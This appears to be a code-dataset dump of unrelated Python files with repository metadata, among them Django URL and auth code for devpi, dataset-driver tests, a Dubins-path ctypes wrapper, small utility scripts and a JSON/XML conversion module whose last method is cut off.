# (r'^admin/', include(admin.site.urls)),
(r'^updatesongdata/$', 'BlorgMusicIngestPipeline.updatesongdata.main'),
(r'^admindata/$', 'BlorgMusicIngestPipeline.admindata.main'),
(r'^parsetwitter/$', 'BlorgMusicIngestPipeline.twitterhandler.main'),
(r'^fetchdata/$', 'BlorgMusicIngestPipeline.fetchdata.main'),
(r'^test/songtitle/$', 'BlorgMusicIngestPipeline.test_songtitleparse.main'),
(r'^rpc/$', 'BlorgMusicHandler.fetchdata.main'),
(r'^ws/', include(ws.urls)),
(r'^$', 'blorgmusic1.views.render'),
)
|
UTF-8
|
Python
| false | false | 2,011 |
14,130,442,424,220 |
f1a4106f1d7f743b9fb8bff768570d1834e0286e
|
9d1fc5eca7b84ef8ca4be6a1392c39def34a0b8c
|
/utils/templatetags/utils_tags.py
|
cf2e9f6a1a5d25baf23515f37d17904d3bffb3eb
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
non_permissive
|
rkabir/NewsBlur
|
https://github.com/rkabir/NewsBlur
|
5fa9780a2499629f6fcc00743e3800d75b9c35df
|
c0f9194cce4e7c6d44c7052a4ca303f38c1d2cfa
|
refs/heads/master
| 2021-01-18T06:59:50.104859 | 2011-03-21T17:53:28 | 2011-03-21T17:53:28 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from django.contrib.sites.models import Site
from django import template
register = template.Library()
@register.simple_tag
def current_domain():
return Site.objects.get_current().domain
|
UTF-8
|
Python
| false | false | 2,011 |
9,122,510,583,305 |
cb2256c243e57eb82e81fdccbab5b77ecd1e283a
|
5c96acb88f66e230416d1d28bbd67542e769c0b6
|
/mapserv/_thrift/introspection.py
|
e5973ecd5860888e721c55a4c4aef6d0013bb6c3
|
[
"ISC"
] |
permissive
|
eklitzke/mapserv
|
https://github.com/eklitzke/mapserv
|
01671005e5feabcc0f167dbb301d37cce229d788
|
b33f41436999a8ebf4f07b3cdfdc5beec5473f67
|
refs/heads/master
| 2020-06-09T07:10:07.952032 | 2009-10-11T21:22:12 | 2009-10-11T21:22:12 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
def is_thrift_obj(obj):
return hasattr(obj, 'thrift_spec')
def walk_thrift(obj):
"""Returns a generator that does a BFS on the thrift structure, yielding
items it finds. Cyclic structures are OK.
"""
if not is_thrift_obj(obj):
raise TypeError, 'Object %r was not a thrift structure' % (obj,)
seen_ids = set()
def walk_obj(o):
q = []
for attr in o.thrift_spec:
if attr is None:
continue
thing = getattr(o, attr[2])
if is_thrift_obj(thing) and id(thing) not in seen_ids:
q.append(thing)
seen_ids.add(id(thing))
yield thing
for thing in q:
for item in walk_obj(thing):
yield item
return walk_obj(obj)
|
UTF-8
|
Python
| false | false | 2,009 |
1,279,900,292,645 |
85f68146ce4bd25ca2846e97ed95263140cc7c19
|
4b57d066671404fd84d99e1a438ad315d1f6b875
|
/mi/dataset/driver/ctdpf_ckl/wfp/test/test_driver.py
|
ada7701a7425979917dc464f79038b2b74c9fb6d
|
[] |
no_license
|
kstiemke/marine-integrations
|
https://github.com/kstiemke/marine-integrations
|
52c0c20bbebf9c0a92a5f89ed1f73b0fe2d5924d
|
e1485ecda888a331a1554450a1d16c58941b6391
|
refs/heads/master
| 2021-01-15T09:37:52.305010 | 2014-06-26T18:01:04 | 2014-06-26T18:01:04 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"""
@package mi.dataset.driver.ctdpf_ckl.wfp.test.test_driver
@file marine-integrations/mi/dataset/driver/ctdpf_ckl/wfp/driver.py
@author cgoodrich
@brief Test cases for ctdpf_ckl_wfp driver
USAGE:
Make tests verbose and provide stdout
* From the IDK
$ bin/dsa/test_driver
$ bin/dsa/test_driver -i [-t testname]
$ bin/dsa/test_driver -q [-t testname]
"""
__author__ = 'cgoodrich'
__license__ = 'Apache 2.0'
import unittest
from nose.plugins.attrib import attr
from mock import Mock
from pyon.agent.agent import ResourceAgentState
from interface.objects import ResourceAgentErrorEvent
from mi.core.log import get_logger ; log = get_logger()
from mi.idk.exceptions import SampleTimeout
from mi.idk.dataset.unit_test import DataSetTestCase
from mi.idk.dataset.unit_test import DataSetIntegrationTestCase
from mi.idk.dataset.unit_test import DataSetQualificationTestCase
from mi.dataset.dataset_driver import DriverParameter
from mi.dataset.dataset_driver import DataSourceConfigKey, DataSetDriverConfigKeys
from mi.dataset.driver.ctdpf_ckl.wfp.driver import CtdpfCklWfpDataSetDriver
from mi.dataset.parser.ctdpf_ckl_wfp import CtdpfCklWfpParserDataParticle, DataParticleType
from mi.dataset.parser.wfp_c_file_common import StateKey
# Fill in driver details
DataSetTestCase.initialize(
driver_module='mi.dataset.driver.ctdpf_ckl.wfp.driver',
driver_class='CtdpfCklWfpDataSetDriver',
agent_resource_id = '123xyz',
agent_name = 'Agent007',
agent_packet_config = CtdpfCklWfpDataSetDriver.stream_config(),
startup_config = {
DataSourceConfigKey.RESOURCE_ID: 'ctdpf_ckl_wfp',
DataSourceConfigKey.HARVESTER:
{
DataSetDriverConfigKeys.DIRECTORY: '/tmp/dsatest',
DataSetDriverConfigKeys.PATTERN: 'C*.DAT',
DataSetDriverConfigKeys.FREQUENCY: 1,
},
DataSourceConfigKey.PARSER: {}
}
)
# The integration and qualification tests generated here are suggested tests,
# but may not be enough to fully test your driver. Additional tests should be
# written as needed.
###############################################################################
# INTEGRATION TESTS #
# Device specific integration tests are for #
# testing device specific capabilities #
###############################################################################
@attr('INT', group='mi')
class IntegrationTest(DataSetIntegrationTestCase):
def test_get(self):
"""
Test that we can get data from files. Verify that the driver
sampling can be started and stopped
"""
self.clear_sample_data()
# Start sampling and watch for an exception
self.driver.start_sampling()
self.clear_async_data()
self.create_sample_data('first.DAT', "C0000001.DAT")
self.assert_data(None, 'first.result.yml', count=4, timeout=10)
self.clear_async_data()
self.create_sample_data('second.DAT', "C0000002.DAT")
self.assert_data(None, 'second.result.yml', count=7, timeout=10)
def test_stop_resume(self):
"""
Test the ability to stop and restart the process
"""
path_1 = self.create_sample_data('first.DAT', "C0000001.DAT")
path_2 = self.create_sample_data('second.DAT', "C0000002.DAT")
# Create and store the new driver state
state = {
'C0000001.DAT': self.get_file_state(path_1, True, 33),
'C0000002.DAT': self.get_file_state(path_2, False, 33)
}
# only the position field in the parser state is initialized in get_file_state, need to add the other state fields
state['C0000001.DAT']['parser_state'][StateKey.RECORDS_READ] = 3
state['C0000001.DAT']['parser_state'][StateKey.METADATA_SENT] = True
state['C0000002.DAT']['parser_state'][StateKey.RECORDS_READ] = 3
state['C0000002.DAT']['parser_state'][StateKey.METADATA_SENT] = True
self.driver = self._get_driver_object(memento=state)
# create some data to parse
self.clear_async_data()
self.driver.start_sampling()
# verify data is produced
self.assert_data(None, 'partial_second.result.yml', count=3, timeout=10)
def test_stop_start_resume(self):
"""
Test the ability to stop and restart sampling, ingesting files in the
correct order
"""
# create some data to parse
self.clear_async_data()
self.driver.start_sampling()
self.create_sample_data('first.DAT', "C0000001.DAT")
self.create_sample_data('second.DAT', "C0000002.DAT")
self.assert_data(None, 'first.result.yml', count=4, timeout=10)
self.assert_file_ingested("C0000001.DAT")
self.assert_file_not_ingested("C0000002.DAT")
self.driver.stop_sampling()
self.driver.start_sampling()
self.assert_data(None, 'second.result.yml', count=7, timeout=10)
self.assert_file_ingested("C0000002.DAT")
def test_sample_exception_empty(self):
"""
Test a case that should produce a sample exception and confirm the
sample exception occurs. In this case an empty file will produce a sample exception.
"""
self.clear_async_data()
config = self._driver_config()['startup_config']['harvester']['pattern']
filename = config.replace("*", "foo")
self.create_sample_data(filename)
# Start sampling and watch for an exception
self.driver.start_sampling()
# an event catches the sample exception
self.assert_event('ResourceAgentErrorEvent')
self.assert_file_ingested(filename)
def test_sample_exception_num_samples(self):
"""
Test a case that should produce a sample exception and confirm the
sample exception occurs. In this case an empty file will produce a sample exception.
"""
self.clear_async_data()
self.create_sample_data('bad_num_samples.DAT', 'C0000001.DAT')
# Start sampling and watch for an exception
self.driver.start_sampling()
# an event catches the sample exception
self.assert_event('ResourceAgentErrorEvent')
self.assert_file_ingested('C0000001.DAT')
def test_timestamp_only(self):
"""
Test a case that should produce a sample exception and confirm the
sample exception occurs. In this case an empty file will produce a sample exception.
"""
self.clear_async_data()
self.create_sample_data('ts_only.DAT', 'C0000001.DAT')
# Start sampling and watch for an exception
self.driver.start_sampling()
self.assert_data(None, 'ts_only.result.yml', count=1, timeout=10)
self.assert_file_ingested('C0000001.DAT')
def test_error(self):
self.create_sample_data('C0000034.DAT')
self.driver.start_sampling()
self.assert_data(None, count=4, timeout=10)
###############################################################################
# QUALIFICATION TESTS #
# Device specific qualification tests are for #
# testing device specific capabilities #
###############################################################################
@attr('QUAL', group='mi')
class QualificationTest(DataSetQualificationTestCase):
def assert_all_queue_empty(self):
"""
Assert the sample queue for all 3 data streams is empty
"""
self.assert_sample_queue_size(DataParticleType.METADATA, 0)
self.assert_sample_queue_size(DataParticleType.DATA, 0)
def test_publish_path(self):
"""
Setup an agent/driver/harvester/parser and verify that data is
published out the agent
"""
self.create_sample_data('first.DAT', 'C0000001.DAT')
self.assert_initialize()
# Verify we get one sample
try:
result = self.data_subscribers.get_samples(DataParticleType.METADATA, 1)
log.debug("First RESULT: %s", result)
result_2 = self.data_subscribers.get_samples(DataParticleType.DATA, 3)
log.debug("Second RESULT: %s", result_2)
result.extend(result_2)
log.debug("Extended RESULT: %s", result)
# Verify values
self.assert_data_values(result, 'first.result.yml')
except Exception as e:
log.error("Exception trapped: %s", e)
self.fail("Sample timeout.")
def test_large_import(self):
"""
Test importing a large number of samples from the file at once
"""
self.create_sample_data('C0000038.DAT')
self.assert_initialize()
# get results for each of the data particle streams
result1 = self.get_samples(DataParticleType.METADATA,1,10)
result2 = self.get_samples(DataParticleType.DATA,270,40)
def test_stop_start(self):
"""
Test the agents ability to start data flowing, stop, then restart
at the correct spot.
"""
log.info("CONFIG: %s", self._agent_config())
self.create_sample_data('first.DAT', "C0000001.DAT")
self.assert_initialize(final_state=ResourceAgentState.COMMAND)
# Slow down processing to 1 per second to give us time to stop
self.dataset_agent_client.set_resource({DriverParameter.RECORDS_PER_SECOND: 1})
self.assert_start_sampling()
try:
# Read the first file and verify the data
result = self.get_samples(DataParticleType.METADATA)
result2 = self.get_samples(DataParticleType.DATA, 3)
result.extend(result2)
log.debug("RESULT: %s", result)
# Verify values
self.assert_data_values(result, 'first.result.yml')
self.assert_all_queue_empty()
self.create_sample_data('second.DAT', "C0000002.DAT")
# Now read the first three records (1 metadata, 2 data) of the second file then stop
result = self.get_samples(DataParticleType.METADATA)
result2 = self.get_samples(DataParticleType.DATA, 2)
result.extend(result2)
log.debug("got result 1 %s", result)
self.assert_stop_sampling()
self.assert_all_queue_empty()
# Restart sampling and ensure we get the last 4 records of the file
self.assert_start_sampling()
result3 = self.get_samples(DataParticleType.DATA, 4)
log.debug("got result 2 %s", result3)
result.extend(result3)
self.assert_data_values(result, 'second.result.yml')
self.assert_all_queue_empty()
except SampleTimeout as e:
log.error("Exception trapped: %s", e, exc_info=True)
self.fail("Sample timeout.")
def test_shutdown_restart(self):
"""
Test a full stop of the dataset agent, then restart the agent
and confirm it restarts at the correct spot.
"""
log.info("CONFIG: %s", self._agent_config())
self.create_sample_data('first.DAT', "C0000001.DAT")
self.assert_initialize(final_state=ResourceAgentState.COMMAND)
# Slow down processing to 1 per second to give us time to stop
self.dataset_agent_client.set_resource({DriverParameter.RECORDS_PER_SECOND: 1})
self.assert_start_sampling()
try:
# Read the first file and verify the data
result = self.get_samples(DataParticleType.METADATA)
result2 = self.get_samples(DataParticleType.DATA, 3)
result.extend(result2)
log.debug("RESULT: %s", result)
# Verify values
self.assert_data_values(result, 'first.result.yml')
self.assert_all_queue_empty()
self.create_sample_data('second.DAT', "C0000002.DAT")
# Now read the first three records (1 metadata, 2 data) of the second file then stop
result = self.get_samples(DataParticleType.METADATA)
result2 = self.get_samples(DataParticleType.DATA, 2)
result.extend(result2)
log.debug("got result 1 %s", result)
self.assert_stop_sampling()
self.assert_all_queue_empty()
# stop the agent
self.stop_dataset_agent_client()
# re-start the agent
self.init_dataset_agent_client()
#re-initialize
self.assert_initialize(final_state=ResourceAgentState.COMMAND)
# Restart sampling and ensure we get the last 4 records of the file
self.assert_start_sampling()
result3 = self.get_samples(DataParticleType.DATA, 4)
log.debug("got result 2 %s", result3)
result.extend(result3)
self.assert_data_values(result, 'second.result.yml')
self.assert_all_queue_empty()
except SampleTimeout as e:
log.error("Exception trapped: %s", e, exc_info=True)
self.fail("Sample timeout.")
def test_parser_exception(self):
"""
Test an exception is raised after the driver is started during
record parsing.
"""
self.clear_sample_data()
self.create_sample_data('bad_num_samples.DAT', 'C0000001.DAT')
self.create_sample_data('first.DAT', 'C0000002.DAT')
self.assert_initialize()
self.event_subscribers.clear_events()
result = self.get_samples(DataParticleType.METADATA)
result1 = self.get_samples(DataParticleType.DATA, 3)
result.extend(result1)
self.assert_data_values(result, 'first.result.yml')
self.assert_all_queue_empty();
# Verify an event was raised and we are in our retry state
self.assert_event_received(ResourceAgentErrorEvent, 10)
self.assert_state_change(ResourceAgentState.STREAMING, 10)
|
UTF-8
|
Python
| false | false | 2,014 |
10,488,310,166,790 |
d02d4b8f213401584de23fb32a402173c6bfb00f
|
8cb8678fbd11966c8fcb5e45c332f8ac892b6226
|
/py/lib/mprocess.py
|
51f49e9f23a7c696852eec4efbaf398fa1c6d3fd
|
[] |
no_license
|
denissmirnov/appserver
|
https://github.com/denissmirnov/appserver
|
a32dd4b66c98c27ba193fc0a7b642939ee998ccc
|
39005f9b9519e1438b9ec51e4305b78b0037182c
|
refs/heads/master
| 2016-08-07T00:07:41.368456 | 2014-06-09T12:56:25 | 2014-06-09T12:56:25 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import signal
import sys
import os
import multiprocessing
import logging
from ctypes import c_bool
class SafeWorker(multiprocessing.Process):
closing = None
i = 0
def termHandler(self, signum, stack):
self.stop()
def safeBlockBegin(self):
signal.signal(signal.SIGINT, signal.SIG_IGN)
signal.signal(signal.SIGTERM, signal.SIG_IGN)
def safeBlockEnd(self):
if self.closing.value:
self.stop()
signal.signal(signal.SIGINT, self.termHandler)
signal.signal(signal.SIGTERM, self.termHandler)
def checkExit(self):
if self.closing.value:
self.stop()
def __init__(self, args=()):
self.closing = multiprocessing.Value(c_bool, False)
super().__init__(target=self.run, args=(self.closing, ) + args)
# def __init__(self, closing):
# self.closing = closing
# super.__init__()
#
# def run(self):
# pass
def safeStop(self):
self.closing.value = True
def stop(self):
logging.debug('terminating the worker pid:%d' % os.getpid(), )
sys.exit(0)
|
UTF-8
|
Python
| false | false | 2,014 |
14,937,896,280,931 |
5a77b190747a0855e4ba49f9d55b714094efe65d
|
21f1a163f6dbccd3b91521875a757c3f93cf0c08
|
/tests/dubins.py
|
2daa0665ce65aecf1a1f0031b9dfb35e07909733
|
[] |
no_license
|
RyanDuToit/Dubins-Curves
|
https://github.com/RyanDuToit/Dubins-Curves
|
d00c3995f0ba5cc5b69bbc3cfb6ac5fd3372fe97
|
1a65985c26910fcc551204f8d7773b30b3e35c3c
|
refs/heads/master
| 2021-01-15T23:21:05.874212 | 2011-03-20T08:10:05 | 2011-03-20T08:10:05 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import ctypes
_lib = ctypes.CDLL('../libdubinspaths.so')
_inf = float('inf')
class _DubinsPathStruct(ctypes.Structure):
_fields_ = [('qi', ctypes.c_double * 3),
('params', ctypes.c_double * 3),
('type', ctypes.c_int)]
def __str__(self):
return 'q = %s, p = %s, type = %d' % (self.qi[:], self.params[:],self.type)
_Configuration = ctypes.c_double * 3
def _createDubinsFunction( name ):
func = getattr(_lib, name)
def res( alpha, beta, d ):
output = (ctypes.c_double * 3)(_inf, _inf, _inf)
a = ctypes.c_double(alpha)
b = ctypes.c_double(beta)
d = ctypes.c_double(d)
func( a, b, d, output )
return output[:]
return res
LRLpath = _createDubinsFunction( 'dubins_LRL' )
RLRpath = _createDubinsFunction( 'dubins_RLR' )
LSLpath = _createDubinsFunction( 'dubins_LSL' )
LSRpath = _createDubinsFunction( 'dubins_LSR' )
RSLpath = _createDubinsFunction( 'dubins_RSL' )
RSRpath = _createDubinsFunction( 'dubins_RSR' )
def init( q0, q1, r=1. ):
q0p = _Configuration(*tuple(q0))
q1p = _Configuration(*tuple(q1))
path = _DubinsPathStruct()
_lib.dubins_init( q0p, q1p, ctypes.c_double(r), ctypes.pointer(path) )
return path
def initNormalised( alpha, beta, d ):
path = _DubinsPathStruct()
a = ctypes.c_double(alpha)
b = ctypes.c_double(beta)
d = ctypes.c_double(d)
_lib.dubins_init_normalised( a, b, d, pointer(path) );
return path
def pathLength( path ):
fun = _lib.dubins_path_length
fun.restype = ctypes.c_double
return fun(ctypes.pointer(path))
def pathSample( path, t ):
q = _Configuration()
_lib.dubins_path_sample(ctypes.pointer(path), ctypes.c_double(t), q)
return q[:]
# types codes
(LSL, LSR, RSL, RSR, RLR, LRL) = map( ctypes.c_int, xrange(6) )
|
UTF-8
|
Python
| false | false | 2,011 |
12,738,873,005,029 |
9442d1e77ba710903f1add6b743a759be7849fdc
|
e61d92ed45094e78996fc41fe6fb50b4a982716b
|
/lib/proprietario.py
|
cd5dda49192b8c7ddf7d5fd2904284b506b47e0e
|
[] |
no_license
|
aledecristojesus/Administradora-de-Imoveis
|
https://github.com/aledecristojesus/Administradora-de-Imoveis
|
bb136882661a17bd45c4db4a5535ecf8a015453b
|
e997c1e603f9ea4976c87a2fb0b0ce6bd59d4bf2
|
refs/heads/master
| 2021-03-12T19:20:56.584323 | 2011-07-14T12:39:59 | 2011-07-14T12:39:59 | 1,837,314 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
# encoding: utf-8
class Proprietario(object):
def __init__(self, nome, cpf, telefone, endereco):
self.nome = nome
self.cpf = cpf
self.telefone = telefone
self.endereco = endereco
|
UTF-8
|
Python
| false | false | 2,011 |
3,092,376,477,756 |
764dfaafde57c6904f0b72f7c0234db6efc1b0a8
|
a4a91a4be52c8cbc0cd5e8e111a19ecfc64d8ba9
|
/etc/flash/makebackupconf.py
|
80ef76b1916690f2e6519efeb3eebb4ea871a02e
|
[
"BSD-3-Clause",
"CC-BY-SA-4.0",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-proprietary-license"
] |
non_permissive
|
Queercon/QC11-Badge
|
https://github.com/Queercon/QC11-Badge
|
5f5ae1b6c4be6a30e88af6c49738025a2771cd0c
|
de412ca7cfdb915e80fab1c13c24bc0c9a08b5ad
|
refs/heads/master
| 2021-01-06T20:39:06.059556 | 2014-08-14T21:34:44 | 2014-08-14T21:34:44 | 99,534,747 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import sys
import os
def main():
id = int(sys.argv[1])
handle = sys.argv[2]
message = sys.argv[3]
if len(handle) > 10:
print "fail on handle length"
exit(1)
if len(message) > 16:
print "fail on message length"
exit(1)
handle += '\0'*(11-len(handle))
message += '\0' * (18-len(message))
chars = []
for i in range(50):
chars.append(255)
chars.append(id)
chars += map(ord, handle)
chars += map(ord, message)
chars += [255, 255]
out = map(lambda a: format(a, 'X').zfill(2), chars)
contents = ''
contents += '@1900\n'
i=0
for v in out:
i+=1
contents += v
if i%16:
contents += ' '
else:
contents += '\n'
contents += '\nq\n'
with open('conf%d.hex' % id, 'w') as f:
f.write(contents)
if __name__ == "__main__":
main()
|
UTF-8
|
Python
| false | false | 2,014 |
17,789,754,568,607 |
d63a823d8031385baddce3fbb2229113eecbfb09
|
a4435d48131a235d2399b55daf0ea6c10840e102
|
/archlinux/software/scala.py
|
4584efc24efeb39ac10e56b5d867f4772e1169b8
|
[] |
no_license
|
daimatz/fabfile
|
https://github.com/daimatz/fabfile
|
93468f5d72392be4bafb96222dd826d017017bbd
|
01fcf6af3e8104200bd1e8a5ac90fde2382e9660
|
refs/heads/master
| 2021-01-23T06:49:41.322105 | 2014-12-21T18:26:23 | 2014-12-21T18:26:23 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from fabric.api import task, sudo
@task
def scala_sbt():
sudo('pacman -Sy --noconfirm jdk7-openjdk scala sbt')
@task
def all():
'''
# scala_sbt.all
scala_sbt()
'''
exec(all.__doc__.strip())
|
UTF-8
|
Python
| false | false | 2,014 |
17,892,833,771,050 |
1359f3368efe9b439848e7bd2e61f03b75dd7f69
|
ff6c8cd90ed14f4ede5182b71bd6d9e0bd3218c9
|
/server/devpi_server/view_auth.py
|
9739fad76743d82dd16f8b34fce728282f6d6e9e
|
[] |
no_license
|
t-8ch/devpi
|
https://github.com/t-8ch/devpi
|
1f6d44cb6cbc696217a0dc587303baa5fcadfeda
|
1bd9ca757ecd3e4128ca5931b25d57f4313aed9e
|
HEAD
| 2016-09-06T08:28:02.782847 | 2014-08-13T22:03:53 | 2014-08-13T22:03:53 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from devpi_common.types import ensure_unicode
from devpi_server.auth import Auth
from devpi_server.views import abort, abort_authenticate
from pyramid.authentication import CallbackAuthenticationPolicy, b64decode
from pyramid.decorator import reify
from pyramid.security import Allow, Deny, Everyone
import binascii
class RootFactory(object):
def __init__(self, request):
self.request = request
self.model = request.registry['xom'].model
@reify
def matchdict(self):
if not self.request.matchdict:
return {}
return dict(
(k, v.rstrip('/'))
for k, v in self.request.matchdict.items())
def __acl__(self):
acl = []
acl.extend([
(Allow, 'root', 'user_delete'),
(Allow, 'root', 'user_create'),
(Allow, 'root', 'user_modify'),
(Allow, 'root', 'index_create'),
(Allow, 'root', 'index_modify'),
(Allow, 'root', 'index_delete'),
(Allow, 'root', 'del_project')])
if self.username == 'root':
acl.append((Deny, Everyone, 'user_delete'))
if self.username:
acl.extend([
(Allow, self.username, 'user_delete'),
(Allow, self.username, 'user_modify'),
(Allow, self.username, 'index_create')])
stage = None
if self.username and self.index:
stage = self.model.getstage(self.username, self.index)
if stage:
for principal in stage.ixconfig.get("acl_upload", []):
if principal == ':ANONYMOUS:':
principal = Everyone
acl.append((Allow, principal, 'pypi_submit'))
acl.extend([
(Allow, self.username, 'index_modify'),
(Allow, self.username, 'index_delete'),
(Allow, self.username, 'del_project')])
return acl
def getstage(self, user, index):
stage = self.model.getstage(user, index)
if not stage:
abort(self.request, 404, "no stage %s/%s" % (user, index))
return stage
@reify
def index(self):
return self.matchdict.get('index')
@reify
def name(self):
return ensure_unicode(self.matchdict.get('name'))
@reify
def version(self):
return ensure_unicode(self.matchdict.get('version'))
@reify
def stage(self):
return self.getstage(self.username, self.index)
@reify
def user(self):
user = self.model.get_user(self.username)
if not user:
abort(self.request, 404, "no user %r" % self.username)
return user
@reify
def username(self):
return self.matchdict.get('user')
class DevpiAuthenticationPolicy(CallbackAuthenticationPolicy):
def __init__(self, xom):
self.realm = "pypi"
self.auth = Auth(xom.model, xom.config.secret)
def unauthenticated_userid(self, request):
""" The userid parsed from the ``Authorization`` request header."""
credentials = self._get_credentials(request)
if credentials:
return credentials[0]
def remember(self, request, principal, **kw):
""" A no-op. Devpi authentication does not provide a protocol for
remembering the user. Credentials are sent on every request.
"""
return []
def forget(self, request):
""" Returns challenge headers. This should be attached to a response
to indicate that credentials are required."""
return [('WWW-Authenticate', 'Basic realm="%s"' % self.realm)]
def callback(self, username, request):
# Username arg is ignored. Unfortunately _get_credentials winds up
# getting called twice when authenticated_userid is called. Avoiding
# that, however, winds up duplicating logic from the superclass.
credentials = self._get_credentials(request)
if credentials:
status, auth_user = self.auth.get_auth_status(credentials)
request.log.debug("got auth status %r for user %r" % (status, auth_user))
if status == "ok":
return []
elif status == "nouser":
abort(request, 404, "user %r does not exist" % auth_user)
elif status == "expired":
abort_authenticate(request, msg="auth expired for %r" % auth_user)
raise ValueError("Unknown authentication status: %s" % status)
def _get_credentials(self, request):
authorization = request.headers.get('X-Devpi-Auth')
if not authorization:
# support basic authentication for setup.py upload/register
authorization = request.headers.get('Authorization')
if not authorization:
return None
try:
authmeth, auth = authorization.split(' ', 1)
except ValueError: # not enough values to unpack
return None
if authmeth.lower() != 'basic':
return None
else:
auth = authorization
try:
authbytes = b64decode(auth.strip())
except (TypeError, binascii.Error): # can't decode
return None
# try utf-8 first, then latin-1; see discussion in
# https://github.com/Pylons/pyramid/issues/898
try:
auth = authbytes.decode('utf-8')
except UnicodeDecodeError:
auth = authbytes.decode('latin-1')
try:
username, password = auth.split(':', 1)
except ValueError: # not enough values to unpack
return None
return username, password
|
UTF-8
|
Python
| false | false | 2,014 |
18,691,697,698,852 |
54d940dd43a8318eec0d044bbac62658713ee439
|
90c80cb41f5a865a9b6cf5e905f873c30924a8d1
|
/rest_easy/core/convert.py
|
f117c2ed473970fa600b75b7c5267e277018b283
|
[
"GPL-3.0-only"
] |
non_permissive
|
tom-kerr/rest_easy
|
https://github.com/tom-kerr/rest_easy
|
2d9a81ec939b81a0fdeaaaf0ab05871ef619a10f
|
38bd80fd76ba6d1118af73b614520f62b5914c6c
|
refs/heads/master
| 2022-02-27T05:08:32.307008 | 2014-08-23T17:37:10 | 2014-08-23T17:37:10 | 11,888,331 | 3 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Copyright (C) 2013 Tom Kerr
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function
import re
import json
import pprint
from copy import copy, deepcopy
from dicttoxml import dicttoxml
import xmltodict
from lxml import etree
class Convert(object):
""" Handles the conversion of JSON or XML to another format.
The options for conversion are 'json', 'xml', or 'obj', where 'obj' is a
DynamicAccessor (see convert.DynamicAccessor)
"""
def _convert_results_(self, results, output_format,
return_format=None, lazy=False, deferred=False):
if output_format == 'application/json':
if not return_format:
results = json.loads(results, encoding='utf-8')
elif return_format.lower() == 'xml':
results = dicttoxml(json.loads(results, encoding='utf-8'))
elif return_format.lower() == 'obj':
jsonresults = json.loads(results, encoding='utf-8')
results = DynamicAccessor(jsonresults, lazy, deferred)
elif output_format == 'text/xml':
if not return_format:
return results
if return_format.lower() == 'json':
results = json.loads(json.dumps(xmltodict.parse(results)),
encoding='utf-8')
elif return_format.lower() == 'obj':
jsonresults = json.loads(json.dumps(xmltodict.parse(results)),
encoding='utf-8')
results = DynamicAccessor(jsonresults, lazy, deferred)
elif output_format == 'javascript':
if not return_format:
return results
if return_format.lower() in ('json', 'xml', 'obj'):
print ('Cannot Convert \'JavaScript\' response to \'' +
return_format.lower() +'\'...returning \'JavaScript\'')
return results
class DynamicAccessor(object):
""" An object that dynamically builds convenience functions for JSON input.
To begin, simply pass json to the constructor:
da = DynamicAccessor(myjson)
The object returned will have a variety of methods for accessing your
data and of the following flavors:
getField -> where 'field' is the key of an item one layer into a
structure to be returned*, such as:
{'field': {'deeper_field': value}}
getFieldBySubField -> where 'field' is the key of a list of dicts which
can be retrieved based on the value of a 'SubField',
for example:
{'items': [ {'id': 1, 'title': ...,
{'id': 2, 'title': ...,
]}
we can retieve an item by id (getItemsById), or by
title (getItemsByTitle), or any other subfield.
All items that match the input for that subfield
will be returned*.
aggrField -> where 'field' is a subfield that occurs more than once among
a list of dicts, and 'aggr' stands for aggregate.
Considering the previous structure, a method called 'aggrId'
would return* a list of the values of every 'id' field.
* If the field being returned contains another nested structure, another
DynamicAccessor will be generated and returned for further access,
otherwise, the value of that field or a list of values will be returned.
One can defer the construction of nested DynamicAccessors by passing
lazy=True to the parent's contructor, and even defer the parent's
construction by passing it deferred=True. Construction of these objects
will take place when one tries to access them.
"""
def __init__(self, response, lazy=False, deferred=False):
self._lazy_ = lazy
self._deferred_ = deferred
self._data_ = response
if not deferred:
self._build_accessors_()
else:
self._built_ = False
def __getattribute__(self, name):
if object.__getattribute__(self, '_deferred_') and \
not object.__getattribute__(self, '_built_'):
object.__getattribute__(self, '_build_accessors_')()
return object.__getattribute__(self, name)
def _build_accessors_(self):
self._built_ = True
_data = self._data_
if isinstance(self._data_, list):
parent = False
elif isinstance(self._data_, dict):
parent = True
if not isinstance(self._data_, list):
hasgetby=False
_data = [_data, ]
elif isinstance(self._data_, list) and len(self._data_)==1:
hasgetby=False
else:
hasgetby=True
self._add_getby_func_('', _data)
for d in _data:
if isinstance(d, dict):
for item in d.items():
attr, data = item
if not hasgetby and isinstance(data, list):
if len(data) == 1 and isinstance(data[0], dict):
if len(data[0].keys()) > 1:
self._add_getby_func_(attr, data)
elif len(data) > 1:
nondicts = [i for i in data if not isinstance(i, dict)]
if not nondicts:
self._add_getby_func_(attr, data)
self._add_get_func_(attr, data, parent)
else:
raise NotImplementedError()
def _add_get_func_(self, attr, data, parent):
def function(raw=False):
fdata = function._data_
if raw:
return fdata
return self._get_formatted_data_(fdata)
attr = self._format_attr_name_(attr)
plural_attr = self._make_plural_(attr)
if hasattr(self, 'get'+attr) or hasattr(self, 'aggr'+plural_attr):
self._append_get_func_(attr, data)
else:
if parent:
self._add_child_get_func_(data)
function._data_ = data
if isinstance(self._data_, list):
setattr(self, 'aggr'+plural_attr, function)
else:
setattr(self, 'get'+attr, function)
def _get_formatted_data_(self, data):
if isinstance(data, list):
return self._format_list_(data)
elif isinstance(data, dict):
return self._format_dict_(data)
else:
return data
def _format_list_(self, lst):
